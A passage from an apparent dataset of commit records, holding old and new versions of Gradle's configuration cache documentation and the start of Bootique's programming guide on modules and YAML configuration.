`FileSystemOperations.sync {}`\n* `project.delete {}` -> `FileSystemOperations.delete {}`\n\n\/\/ TODO - examples, more details\n\n[[task_access]]\n=== Accessing a task instance from another instance\n\nTasks should not directly access the state of another instance.\nInstead, tasks should be connected using inputs and outputs.\n\nTo fix, connect tasks using input and output relationships.\n`Property` and `Provider` types can be useful for this.\n\n\/\/ TODO - examples, more details\n\n[[build_listeners]]\n=== Using build listeners\n\nPlugins and build scripts must not register any build listeners.\n\nTo fix, use a <<build_services#build_services,build service>>.\n\n\/\/ TODO - examples, more details\n\n[[undeclared_sys_prop_read]]\n=== Undeclared reading of system properties\n\nPlugins and build scripts should not read system properties directly using the Java APIs at configuration time.\nInstead, these system properties must be declared as a potential build input by using the value supplier APIs.\n\nThis problem is caused by build logic similar to this:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef enabled = System.getProperty(\"some-property\")\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval enabled = System.getProperty(\"some-property\")\n----\n=====\n====\n\nTo fix this problem, read system properties using link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#systemProperty-java.lang.String-[providers.systemProperty()] instead:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef enabled = providers.systemProperty(\"some-property\").forUseAtConfigurationTime().present\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval enabled = providers.systemProperty(\"some-property\").forUseAtConfigurationTime().isPresent\n----\n=====\n====\n\nIn general, you should avoid reading the value of system properties at configuration time, to avoid invalidating configuration cache entries when the system property value changes.\nInstead, you can connect the `Provider` returned by link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#systemProperty-java.lang.String-[providers.systemProperty()] to task properties.\n\n[[undeclared_env_var_read]]\n=== Undeclared reading of environment variables\n\nPlugins and build scripts should not read environment variables directly using the Java APIs at configuration time.\nInstead, declare environment variables as potential build inputs using the value supplier APIs.\n\nThis problem is caused by build logic similar to this:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef enabled = System.getenv(\"SOME_ENV_VAR\")\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval enabled = System.getenv(\"SOME_ENV_VAR\")\n----\n=====\n====\n\nTo fix this problem, read environment variables using link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#environmentVariable-java.lang.String-[providers.environmentVariable()] instead:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef enabled = providers.environmentVariable(\"SOME_ENV_VAR\").forUseAtConfigurationTime().present\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval enabled = providers.environmentVariable(\"SOME_ENV_VAR\").forUseAtConfigurationTime().isPresent\n----\n=====\n====\n\nIn general, you should avoid reading the value of environment variables at configuration time, to avoid invalidating configuration cache entries when the environment variable value changes.\nInstead, you can connect the `Provider` returned by link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#environmentVariable-java.lang.String-[providers.environmentVariable()] to task properties.\n\n[[undeclared_file_read]]\n=== Undeclared reading of files\n\nPlugins and build scripts should not read files directly using the Java, Groovy or Kotlin APIs at configuration time.\nInstead, declare files as potential build inputs using the value supplier APIs.\n\nThis problem is caused by build logic similar to this:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef config = file(\"some.conf\").text\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval config = file(\"some.conf\").readText()\n----\n=====\n====\n\nTo fix this problem, read files using link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#fileContents-org.gradle.api.file.RegularFile-[providers.fileContents()] instead:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef config = providers.fileContents(\"some.conf\").forUseAtConfigurationTime().asText\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval config = providers.fileContents(\"some.conf\").forUseAtConfigurationTime().asText\n----\n=====\n====\n\nIn general, you should avoid reading files at configuration time, to avoid invalidating configuration cache entries when the file content changes.\nInstead, you can connect the `Provider` returned by link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#fileContents-org.gradle.api.file.RegularFile-[providers.fileContents()] to task properties.\n\n[[not_yet_implemented]]\n== Not yet implemented\n\nSupport for using configuration caching with certain Gradle features is not yet implemented.\nSupport for these features will be added in later Gradle releases.\n\n=== Build scan support\n\nWhen it comes to link:https:\/\/gradle.com\/build-scans\/[build scans], only the `--scan` command line option is supported for now.\n\nThe build scan plugin is currently ignored when applied via an init script or build script, as is any configuration done via the build scan extension (server location, accept license, tags, etc).\nThis means that scans will be published to the public `scans.gradle.com` instance by default.\n\n[[composite_builds]]\n=== Composite builds\n\nWhen using the configuration cache on a <<composite_builds#composite_builds,composite build>> a problem will be reported.\nIf you <<configuration_cache#ignore_problems,ignore problems>> then the included builds will be skipped when reusing the configuration cache.\n\n=== Source dependencies\n\nSupport for link:https:\/\/blog.gradle.org\/introducing-source-dependencies[source dependencies] is not yet implemented.\nWith the configuration cache enabled, no problem will be reported and the build will fail.\n\n=== Dependency locking\n\n<<dependency_locking#dependency-locking, Locking dependency versions>> isn't supported yet.\nWith the configuration cache enabled, no problem will be reported and dependency locks will be ignored.\n\n=== Dynamic or changing dependencies\n\n<<dynamic_versions#sec:dynamic_versions_and_changing_modules,Dependencies with versions which change over time>> aren't supported yet.\nWith the configuration cache enabled, no problem will be reported and changes to dependencies won't be detected.\n\n=== Filesystem repositories\n\nRepositories on local file systems are not supported yet.\nWith the configuration cache enabled, no problem will be reported and changes to the filesystem in the repositories won't be detected.\n\nThis includes:\n\n* <<declaring_repositories#sec:declaring_custom_repository,Maven or Ivy repositories>> with `file:\/\/` URLs,\n* <<declaring_repositories#sub:maven_local,`mavenLocal()`>>,\n* and <<declaring_repositories#sub:flat_dir_resolver,flat directory repositories>>.\n\n[[testkit]]\n== Testing Build Logic with TestKit\n\nThe Gradle TestKit (a.k.a. just TestKit) is a library that aids in testing Gradle plugins and build logic generally.\nFor general guidance on how to use TestKit see the <<test_kit.adoc#test_kit,dedicated chapter>>.\n\nTo enable configuration caching in your tests, you can pass the `--configuration-cache` argument to link:{javadocPath}\/org\/gradle\/testkit\/runner\/GradleRunner.html[GradleRunner] or use one of the other methods described in <<configuration_cache.adoc#enable,Enabling the configuration cache>>.\n\nYou need to run your tasks twice.\nOnce to prime the configuration cache.\nOnce to reuse the configuration cache.\n\n.Testing the configuration cache\n====\ninclude::sample[dir=\"snippets\/configurationCache\/testKit\/groovy\",files=\"src\/test\/groovy\/org\/example\/BuildLogicFunctionalTest.groovy[tags=functional-test-configuration-cache]\"]\ninclude::sample[dir=\"snippets\/configurationCache\/testKit\/kotlin\",files=\"src\/test\/kotlin\/org\/example\/BuildLogicFunctionalTest.kt[tags=functional-test-configuration-cache]\"]\n====\n<1> First run primes the configuration cache.\n<2> Second run reuses the configuration cache.\n<3> Assert that the configuration cache gets reused.\n\nIf problems with the configuration cache are found then Gradle will fail the build reporting the problems, and the test will fail.\n\nWhen gradually improving your plugin or build logic to support the configuration cache it can be useful to temporarily <<configuration_cache.adoc#ignore_problems,ignore problems>> or <<configuration_cache.adoc#max_problems,allow a given number of problems>>.\n","old_contents":"[[config_cache]]\n= Configuration cache\n\n[NOTE]\n====\nThe configuration cache is an <<feature_lifecycle.adoc#feature_lifecycle,incubating>> feature, and the details described here may change.\n====\n\n\n== Introduction\n\nThe configuration cache is a feature that significantly improves build performance by caching the result of the <<build_lifecycle#build_lifecycle,configuration phase>> and reusing this for subsequent builds.\nUsing the configuration cache, Gradle can skip the configuration phase entirely when nothing that affects the build configuration, such as build scripts, has changed.\nGradle also applies some performance improvements to task execution as well.\n\nThe configuration cache is conceptually similar to the <<build_cache#build_cache,build cache>>, but caches different information.\nThe build cache takes care of caching the outputs and intermediate files of the build, such as task outputs or artifact transform outputs.\nThe configuration cache takes care of caching the build configuration for a particular set of tasks.\nIn other words, the configuration cache caches the output of the configuration phase, and the build cache caches the outputs of the execution phase.\n\n[IMPORTANT]\n====\nThis feature is currently *experimental* and not enabled by default.\n====\n\n=== How does it work?\n\nWhen the configuration cache is enabled and you run Gradle for a particular set of tasks, for example by running `gradlew check`, Gradle checks whether a configuration cache entry is available for the requested set of tasks.\nIf available, Gradle uses this entry instead of running the configuration phase.\nThe cache entry contains information about the set of tasks to run, along with their configuration and dependency information.\n\nThe first time you run a particular set of tasks, there will be no entry in the configuration cache for these tasks and so Gradle will run the configuration phase as normal:\n\n1. Run init scripts.\n2. Run the settings script for the build, applying any requested settings plugins.\n3. Configure and build the `buildSrc` project, if present.\n4. Run the builds scripts for the build, applying any requested project plugins.\n5. Calculate the task graph for the requested tasks, running any deferred configuration actions.\n\nFollowing the configuration phase, Gradle writes the state of the task graph to the configuration cache, taking a snapshot for later Gradle invocations.\nThe execution phase then runs as normal.\nThis means you will not see any build performance improvement the first time you run a particular set of tasks.\n\nWhen you subsequently run Gradle with this same set of tasks, for example by running `gradlew check` again, Gradle will load the tasks and their configuration directly from the configuration cache and skip the configuration phase entirely.\nBefore using a configuration cache entry, Gradle checks that none of the \"build inputs\", such as build scripts, for the entry have changed.\nIf a build input has changed, Gradle will not use the entry and will run the configuration phase again as above, saving the result for later reuse.\n\nBuild inputs include:\n\n- Init scripts, settings scripts, build scripts.\n- System properties, Gradle properties and configuration files used during the configuration phase, accessed using value suppliers (TODO - add docs for this).\n- build inputs and source files for `buildSrc` projects.\n\n=== Performance improvements\n\nApart from skipping the configuration phase, the configuration cache provides some additional performance improvements:\n\n- All tasks run in parallel by default.\n- Dependency resolution is cached.\n\n== Using the configuration cache\n\n[[enable]]\n=== Enabling the configuration cache\n\nBy default, the configuration cache is not enabled.\nIt can be enabled from the command line:\n\n[source,bash]\n----\n$ gradle --configuration-cache\n----\n\nIt can also be enabled persistently in a `gradle.properties` file:\n\n[source,properties]\n----\norg.gradle.unsafe.configuration-cache=true\n----\n\nIf it is enabled in a `gradle.properties` file, it can be disabled on the command line for one build invocation:\n\n[source,bash]\n----\n$ gradle --no-configuration-cache\n----\n\n[[ignore_problems]]\n=== Ignoring problems\n\nBy default, Gradle will fail the build if any configuration cache problems are encountered.\nConfiguration cache problems can be turned into warnings on the command line:\n\n[source,bash]\n----\n$ gradle --configuration-cache-problems=warn\n----\n\nor in a `gradle.properties` file:\n\n[source,properties]\n----\norg.gradle.unsafe.configuration-cache-problems=warn\n----\n\n[[max_problems]]\n=== Allowing a maximum number of problems\n\nWhen configuration cache problems are turned into warnings, Gradle will fail the build if `512` problems are found by default.\n\nThis can be adjusted by specifying an allowed maximum number of problems on the command line:\n\n[source,bash]\n----\n$ gradle -Dorg.gradle.unsafe.configuration-cache.max-problems=5\n----\n\nor in a `gradle.properties` file:\n\n[source,properties]\n----\norg.gradle.unsafe.configuration-cache.max-problems=5\n----\n\n=== Invalidating the cache\n\nThe configuration cache is automatically invalidated when inputs to the configuration phase change.\nBut, you may have to manually invalidate the configuration cache when untracked inputs to the configuration phase change.\nThis can happen if you <<configuration_cache#ignore_problems,ignored problems>>, or when remote dependencies changed for example.\nSee the <<configuration_cache#requirements>> and <<configuration_cache#not_yet_implemented>> sections below for more information.\n\nThe configuration cache state is stored on disk in a directory named `.gradle\/configuration-cache` in the root directory of the Gradle build in use.\nIf you need to invalidate the cache, simply delete that directory:\n\n[source,bash]\n----\n$ rm -rf .gradle\/configuration-cache\n----\n\nConfiguration cache entries are checked periodically (at most every 24 hours) for whether they are still in use.\nThey are deleted if they haven't been used for 7 days.\n\n[[plugin_support]]\n== Supported plugins\n\n=== Core Gradle plugins\n\nNot all <<plugin_reference#plugin_reference, core Gradle plugins>> support configuration caching yet.\n\n[cols=3*]\n|===\nh| JVM languages and frameworks\nh| Native languages\nh| Packaging and distribution\n\na|\n[horizontal]\n[.yellow]#*\u26a0*#:: <<java_plugin.adoc#java_plugin,Java>>\n[.yellow]#*\u26a0*#:: <<java_library_plugin.adoc#java_library_plugin,Java Library>>\n[.yellow]#*\u26a0*#:: <<java_platform_plugin.adoc#java_platform_plugin,Java Platform>>\n[.yellow]#*\u26a0*#:: <<groovy_plugin.adoc#groovy_plugin,Groovy>>\n[.red]#\u2716#:: <<scala_plugin.adoc#scala_plugin,Scala>>\n[.yellow]#*\u26a0*#:: <<antlr_plugin.adoc#antlr_plugin,ANTLR>>\n\na|\n[horizontal]\n[.red]#\u2716#:: <<cpp_application_plugin.adoc#cpp_application_plugin,C++ Application>>\n[.red]#\u2716#:: <<cpp_library_plugin.adoc#cpp_library_plugin,C++ Library>>\n[.red]#\u2716#:: <<cpp_unit_test_plugin.adoc#cpp_unit_test_plugin,C++ Unit Test>>\n[.red]#\u2716#:: <<swift_application_plugin.adoc#swift_application_plugin,Swift Application>>\n[.red]#\u2716#:: <<swift_library_plugin.adoc#swift_library_plugin,Swift Library>>\n[.red]#\u2716#:: <<xctest_plugin.adoc#xctest_plugin,XCTest>>\n\na|\n[horizontal]\n[.green]#*\u2713*#:: <<application_plugin.adoc#application_plugin,Application>>\n[.green]#*\u2713*#:: <<war_plugin.adoc#war_plugin,WAR>>\n[.green]#*\u2713*#:: <<ear_plugin.adoc#ear_plugin,EAR>>\n[.red]#\u2716#:: <<publishing_maven.adoc#publishing_maven,Maven Publish>>\n[.red]#\u2716#:: <<publishing_ivy.adoc#publishing_ivy,Ivy Publish>>\n[.gray]#\u2716#:: <<maven_plugin.adoc#maven_plugin,Legacy Maven Plugin>>\n[.green]#*\u2713*#:: <<distribution_plugin.adoc#distribution_plugin,Distribution>>\n[.yellow]#*\u26a0*#:: <<java_library_distribution_plugin.adoc#java_library_distribution_plugin,Java Library Distribution>>\n\nh|\u00a0Code analysis\nh|\u00a0IDE integration\nh| Utility\n\na|\n[horizontal]\n[.red]#\u2716#:: <<checkstyle_plugin.adoc#checkstyle_plugin,Checkstyle>>\n[.red]#\u2716#:: <<pmd_plugin.adoc#pmd_plugin,PMD>>\n[.red]#\u2716#:: <<jacoco_plugin.adoc#jacoco_plugin,JaCoCo>>\n[.red]#\u2716#:: <<codenarc_plugin.adoc#codenarc_plugin,CodeNarc>>\n\na|\n[horizontal]\n[.red]#\u2716#:: <<eclipse_plugin.adoc#eclipse_plugin,Eclipse>>\n[.red]#\u2716#:: <<idea_plugin.adoc#idea_plugin,IntelliJ IDEA>>\n[.red]#\u2716#:: <<visual_studio_plugin.adoc#visual_studio_plugin,Visual Studio>>\n[.red]#\u2716#:: <<xcode_plugin.adoc#xcode_plugin,Xcode>>\n\na|\n[horizontal]\n[.green]#*\u2713*#:: <<base_plugin.adoc#base_plugin,Base>>\n[.yellow]#*\u26a0*#:: <<build_init_plugin.adoc#build_init_plugin,Build Init>>\n[.red]#\u2716#:: <<signing_plugin.adoc#signing_plugin,Signing>>\n[.yellow]#*\u26a0*#:: <<java_gradle_plugin.adoc#java_gradle_plugin,Plugin Development>>\n[.red]#\u2716#:: <<project_report_plugin.adoc#project_report_plugin,Project Report Plugin>>\n\n|===\n\n[horizontal]\n[.green]#*\u2713*#:: Supported plugin\n[.yellow]#*\u26a0*#:: Partially supported plugin\n[.red]#\u2716#:: Unsupported plugin\n[.gray]#\u2716#:: Won't fix\n\nLater Gradle releases will add support for more core plugins.\n\n[[troubleshooting]]\n== Troubleshooting\n\nUpon failure to serialize the state required to run the tasks, an HTML report of detected problems is generated.\nThe Gradle failure output includes a clickable link to the report.\n\n\/\/ TODO sample output from snippet\n\nThe report displays the set of problems twice.\nFirst grouped by problem message, then grouped by task.\nThe former allows to quickly see what classes of problems your build is facing.\nThe latter allows to quickly see which tasks are problematic.\nIn both cases you can expand the tree in order to discover where in the object graph is the culprit.\n\n[TIP]\n====\nProblems displayed in the report have links to the corresponding <<configuration_cache#requirements,requirement>> where you can find guidance on how to fix the problem or to the corresponding <<configuration_cache#not_yet_implemented,not yet implemented>> feature.\n\nWhen changing your build or plugin to fix the problems you should consider <<configuration_cache#testkit, testing your build logic with TestKit>>.\n====\n\n[[requirements]]\n== Requirements\n\nIn order to capture the state of the task graph to the configuration cache and reload it again in a later build, Gradle applies certain requirements to tasks and other build logic.\nEach of these requirements is treated as a configuration cache \"problem\" and fail the build if violations are present.\n\nThe following sections describe each of the requirements and how to change your build to fix the problems.\n\n[[disallowed_types]]\n=== Certain types must not be referenced by tasks\n\nThere are a number of types that task instances must not reference from their fields.\nUsually these types are used to carry some task input that should be explicitly declared instead.\n\nTo fix, you can often replace such a field with a `Property` or `Provider` typed field that exposes the exact information that the task will need at execution time.\n\n\/\/ TODO - examples, more details\n\n[[use_project_during_execution]]\n=== Using the `Project` object\n\nA task must not use any `Project` objects at execution time.\nThis includes calling `Task.getProject()` while the task is running.\n\nSome cases can be fixed in the same way as the previous requirement.\n\nOften, similar things are available on both `Project` and `Task.\nFor example if you need a `Logger` in your task actions you should use `Task.logger` instead of `Project.logger`.\n\nOtherwise, to fix, use <<custom_gradle_types#service_injection,injected services>> instead of the methods of `Project`:\n\n* `project.file(path)` -> `ProjectLayout.projectDirectory.file(path)` or `ProjectLayout.buildDirectory.file(path)`\n* `project.files(paths)` -> `ObjectFactory.fileCollection().from(paths)`\n* `project.fileTree(dir)` -> `ObjectFactory.fileTree().from(dir)`\n* `project.exec {}` -> `ExecOperations.exec {}`\n* `project.javaexec {}` -> `ExecOperations.javaexec {}`\n* `project.copy {}` -> `FileSystemOperations.copy {}`\n* `project.sync {}` -> `FileSystemOperations.sync {}`\n* `project.delete {}` -> `FileSystemOperations.delete {}`\n\n\/\/ TODO - examples, more details\n\n[[task_access]]\n=== Accessing a task instance from another instance\n\nTasks should not directly access the state of another instance.\nInstead, tasks should be connected using inputs and outputs.\n\nTo fix, connect tasks using input and output relationships.\n`Property` and `Provider` types can be useful for this.\n\n\/\/ TODO - examples, more details\n\n[[build_listeners]]\n=== Using build listeners\n\nPlugins and build scripts must not register any build listeners.\n\nTo fix, use a <<build_services#build_services,build service>>.\n\n\/\/ TODO - examples, more details\n\n[[undeclared_sys_prop_read]]\n=== Undeclared reading of system properties\n\nPlugins and build scripts should not read system properties directly using the Java APIs at configuration time.\nInstead, these system properties must be declared as a potential build input by using the value supplier APIs.\n\nThis problem is caused by build logic similar to this:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef enabled = System.getProperty(\"some-property\")\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval enabled = System.getProperty(\"some-property\")\n----\n=====\n====\n\nTo fix this problem, read system properties using link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#systemProperty-java.lang.String-[providers.systemProperty()] instead:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef enabled = providers.systemProperty(\"some-property\").forUseAtConfigurationTime().present\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval enabled = providers.systemProperty(\"some-property\").forUseAtConfigurationTime().isPresent\n----\n=====\n====\n\nIn general, you should avoid reading the value of system properties at configuration time, to avoid invalidating configuration cache entries when the system property value changes.\nInstead, you can connect the `Provider` returned by link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#systemProperty-java.lang.String-[providers.systemProperty()] to task properties.\n\n[[undeclared_env_var_read]]\n=== Undeclared reading of environment variables\n\nPlugins and build scripts should not read environment variables directly using the Java APIs at configuration time.\nInstead, declare environment variables as potential build inputs using the value supplier APIs.\n\nThis problem is caused by build logic similar to this:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef enabled = System.getenv(\"SOME_ENV_VAR\")\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval enabled = System.getenv(\"SOME_ENV_VAR\")\n----\n=====\n====\n\nTo fix this problem, read environment variables using link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#environmentVariable-java.lang.String-[providers.environmentVariable()] instead:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef enabled = providers.environmentVariable(\"SOME_ENV_VAR\").forUseAtConfigurationTime().present\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval enabled = providers.environmentVariable(\"SOME_ENV_VAR\").forUseAtConfigurationTime().isPresent\n----\n=====\n====\n\nIn general, you should avoid reading the value of environment variables at configuration time, to avoid invalidating configuration cache entries when the environment variable value changes.\nInstead, you can connect the `Provider` returned by link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#environmentVariable-java.lang.String-[providers.environmentVariable()] to task properties.\n\n[[undeclared_file_read]]\n=== Undeclared reading of files\n\nPlugins and build scripts should not read files directly using the Java, Groovy or Kotlin APIs at configuration time.\nInstead, declare files as potential build inputs using the value supplier APIs.\n\nThis problem is caused by build logic similar to this:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef config = file(\"some.conf\").text\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval config = file(\"some.conf\").readText()\n----\n=====\n====\n\nTo fix this problem, read files using link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#fileContents-org.gradle.api.file.RegularFile-[providers.fileContents()] instead:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef config = providers.fileContents(\"some.conf\").forUseAtConfigurationTime().asText\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval config = providers.fileContents(\"some.conf\").forUseAtConfigurationTime().asText\n----\n=====\n====\n\nIn general, you should avoid reading files at configuration time, to avoid invalidating configuration cache entries when the file content changes.\nInstead, you can connect the `Provider` returned by link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#fileContents-org.gradle.api.file.RegularFile-[providers.fileContents()] to task properties.\n\n[[not_yet_implemented]]\n== Not yet implemented\n\nSupport for using configuration caching with certain Gradle features is not yet implemented.\nSupport for these features will be added in later Gradle releases.\n\n=== Build scan support\n\nWhen it comes to link:https:\/\/gradle.com\/build-scans\/[build scans], only the `--scan` command line option is supported for now.\n\nThe build scan plugin is currently ignored when applied via an init script or build script, as is any configuration done via the build scan extension (server location, accept license, tags, etc).\nThis means that scans will be published to the public `scans.gradle.com` instance by default.\n\n[[composite_builds]]\n=== Composite builds\n\nWhen using the configuration cache on a <<composite_builds#composite_builds,composite build>> a problem will be reported.\nIf you <<configuration_cache#ignore_problems,ignore problems>> then the included builds will be skipped when reusing the configuration cache.\n\n=== Source dependencies\n\nSupport for link:https:\/\/blog.gradle.org\/introducing-source-dependencies[source dependencies] is not yet implemented.\nWith the configuration cache enabled, no problem will be reported and the build will fail.\n\n=== Dependency locking\n\n<<dependency_locking#dependency-locking, Locking dependency versions>> isn't supported yet.\nWith the configuration cache enabled, no problem will be reported and dependency locks will be ignored.\n\n=== Dynamic or changing dependencies\n\n<<dynamic_versions#sec:dynamic_versions_and_changing_modules,Dependencies with versions which change over time>> aren't supported yet.\nWith the configuration cache enabled, no problem will be reported and changes to dependencies won't be detected.\n\n=== Filesystem repositories\n\nRepositories on local file systems are not supported yet.\nWith the configuration cache enabled, no problem will be reported and changes to the filesystem in the repositories won't be detected.\n\nThis includes:\n\n* <<declaring_repositories#sec:declaring_custom_repository,Maven or Ivy repositories>> with `file:\/\/` URLs,\n* <<declaring_repositories#sub:maven_local,`mavenLocal()`>>,\n* and <<declaring_repositories#sub:flat_dir_resolver,flat directory repositories>>.\n\n[[testkit]]\n== Testing Build Logic with TestKit\n\nThe Gradle TestKit (a.k.a. just TestKit) is a library that aids in testing Gradle plugins and build logic generally.\nFor general guidance on how to use TestKit see the <<test_kit.adoc#test_kit,dedicated chapter>>.\n\nTo enable configuration caching in your tests, you can pass the `--configuration-cache` argument to link:{javadocPath}\/org\/gradle\/testkit\/runner\/GradleRunner.html[GradleRunner] or use one of the other methods described in <<configuration_cache.adoc#enable,Enabling the configuration cache>>.\n\nYou need to run your tasks twice.\nOnce to prime the configuration cache.\nOnce to reuse the configuration cache.\n\n.Testing the configuration cache\n====\ninclude::sample[dir=\"snippets\/configurationCache\/testKit\/groovy\",files=\"src\/test\/groovy\/org\/example\/BuildLogicFunctionalTest.groovy[tags=functional-test-configuration-cache]\"]\ninclude::sample[dir=\"snippets\/configurationCache\/testKit\/kotlin\",files=\"src\/test\/kotlin\/org\/example\/BuildLogicFunctionalTest.kt[tags=functional-test-configuration-cache]\"]\n====\n<1> First run primes the configuration cache.\n<2> Second run reuses the configuration cache.\n<3> Assert that the configuration cache gets reused.\n\nIf problems with the configuration cache are found then Gradle will fail the build reporting the problems, and the test will fail.\n\nWhen gradually improving your plugin or build logic to support the configuration cache it can be useful to temporarily <<configuration_cache.adoc#ignore_problems,ignore problems>> or <<configuration_cache.adoc#max_problems,allow a given number of problems>>.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"517e8504058de4cbbbcca01ab76e109d6e298f6f","subject":"docs: removing obsolete piece of advice","message":"docs: removing obsolete piece of advice\n","repos":"bootique\/bootique,nhl\/bootique,bootique\/bootique","old_file":"bootique-docs\/src\/main\/asciidoc\/bootique-docs\/_chapters\/_02_programming.adoc","new_file":"bootique-docs\/src\/main\/asciidoc\/bootique-docs\/_chapters\/_02_programming.adoc","new_contents":"\/\/ Licensed to ObjectStyle LLC under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ObjectStyle LLC licenses\n\/\/ this file to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\n== Part II. Programming\n\n=== Modules\n\nBootique apps are made of \"modules\". The framework simply locates all available modules, loads them in the DI environment,\nparses the command line, and then transfers control to a Command (that can originate from any of the modules) that\nmatched the user choice. There's a growing list of modules created by Bootique development team. And you can easily\nwrite your own. In fact, programming in Bootique is primarily about writing Modules.\n\nA module is a Java library that contains some code. What makes it a module is a special Java class that implements\nhttps:\/\/google.github.io\/guice\/api-docs\/latest\/javadoc\/index.html?com\/google\/inject\/Module.html[Guice Module interface].\nThis class defines what \"services\" or other types of objects the module provides (in other words what will be injectable\nby the module users). This is done in a form of \"bindings\", i.e. associations between publicly visible injectable\nservice interfaces and specific implementations:\n\n[source,java]\n----\npublic class MyModule implements Module {\n @Override\n public void configure(Binder binder) {\n binder.bind(MyService.class).to(MyServiceImpl.class);\n }\n}\n----\n\nThere are other flavors of bindings in Guice. Please refer to https:\/\/github.com\/google\/guice\/wiki\/Motivation[Guice documentation]\nfor details. One important form extensively used in Bootique is https:\/\/github.com\/google\/guice\/wiki\/Multibindings[Multibinding].\n\n=== Modules Auto-Loading\n\nModules can be automatically loaded via `Bootique.autoLoadModules()` as long as they are included in your application dependencies. Auto-loading depends on the Java https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/ServiceLoader.html[ServiceLoader mechanism]. To ensure your modules can be auto-loaded do two things. First implement `io.bootique.BQModuleProvider` interface specific to your module:\n\n[source,java]\n----\npublic class MyModuleProvider implements BQModuleProvider {\n @Override\n public Module module() {\n return new MyModule();\n }\n}\n----\n\nAfter that create a file `META-INF\/services\/io.bootique.BQModuleProvider` with the only line being the name of your BQModuleProvider implementor. E.g.:\n\n[source,text]\n----\ncom.foo.MyModuleProvider\n----\n\n`BQModuleProvider` has two more methods that you can optionally implement to help Bootique to make sense of the module being loaded:\n\n[source,java]\n----\npublic class MyModuleProvider implements BQModuleProvider {\n \/\/ ...\n\n \/\/ provides human-readable name of the module\n @Override\n public String name() {\n return \"CustomName\";\n }\n\n \/\/ a collection of modules whose services are overridden by this module\n @Override\n public Collection<Class<? extends Module>> overrides() {\n return Collections.singleton(BQCoreModule.class);\n }\n}\n----\n\nIf in your Module you are planning to redefine any services from the upstream modules, specify those upstream modules in the `overrides()` collection. In practice overrides are rarely needed, and often can be replaced with service decomposition.\n\n=== Configuration and Configurable Factories\n\nBootique Modules obtain their configuration in a form of \"factory objects\". We'll show some examples shortly. For now let's focus on the big picture, namely the fact that Bootique app configuration is multi-layered and roughly follows the sequence of \"code - config files (contributed) - config files (CLI) - overrides\". \"Code\" is the default values that are provided in constructors of factory objects. Config files overlay those defaults with their own values. Config files can be either contributed in the code, or specified on the command line. Files is where the bulk of configuration usually stored. Finally config values may be further overridden via Java properties and\/or environment variables.\n\n==== Configuration via YAML Files\n\nFormat of configuration file can be either JSON or YAML. For simplicity we'll focus on YAML format, but the two are interchangeable. Here is an example config file:\n\n[source,yaml]\n----\nlog:\n level: warn\n appenders:\n - type: file\n logFormat: '%c{20}: %m%n'\n file: target\/logback\/debug.log\n\njetty:\n context: \/myapp\n connectors:\n - port: 12009\n----\n\nWhile not strictly required, as a rule the top-level keys in the file belong to configuration objects of individual modules. In the example above \"log\" subtree configures `bootique-logback` module, while \"jetty\" subtree configures `bootique-jetty`. For standard modules refer to module-specific documentation on the structure of the supported configuration (or run your 